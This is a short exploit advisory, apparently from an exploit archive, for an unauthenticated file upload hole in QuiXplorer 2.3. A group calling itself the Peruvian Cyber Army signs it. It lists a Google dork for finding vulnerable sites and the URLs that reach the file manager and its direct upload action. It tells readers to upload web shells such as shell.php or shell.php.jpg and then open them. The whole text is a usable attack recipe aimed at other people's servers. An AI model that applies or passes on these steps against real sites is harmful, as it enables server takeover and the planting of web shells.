QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability

1. # Exploit Title: QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability
2. # Google Dork: "QuiXplorer 2.3 - the QuiX project"
3. # Date: 13/11/2011
4. # Author: PCA & krhr_krhr and
5. # Software Link: http://quixplorer.sourceforge.net/
6. # Version: QuiXplorer 2.3
7. # Tested on: linux ,windows
8. # CVE :
9. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
10. Vulnerablity
11. http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
12. http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
13. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------
14. after Going to this you will saw a file manager
15. you can upload your files here
16. find this icons in page and click on last, its upload option ::
17. You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
18. after index.php?
19. Quote:
20. example : http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
21. Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
22. - anything support file
23. click On you file For view
24. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------
25. PCA PERUVIAN CYBER ARMY & krhr_krhr and (HF)
26. PCA TEAM :
27. -rAtoN
28. -Chipd3bios
29. -jardha
30. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------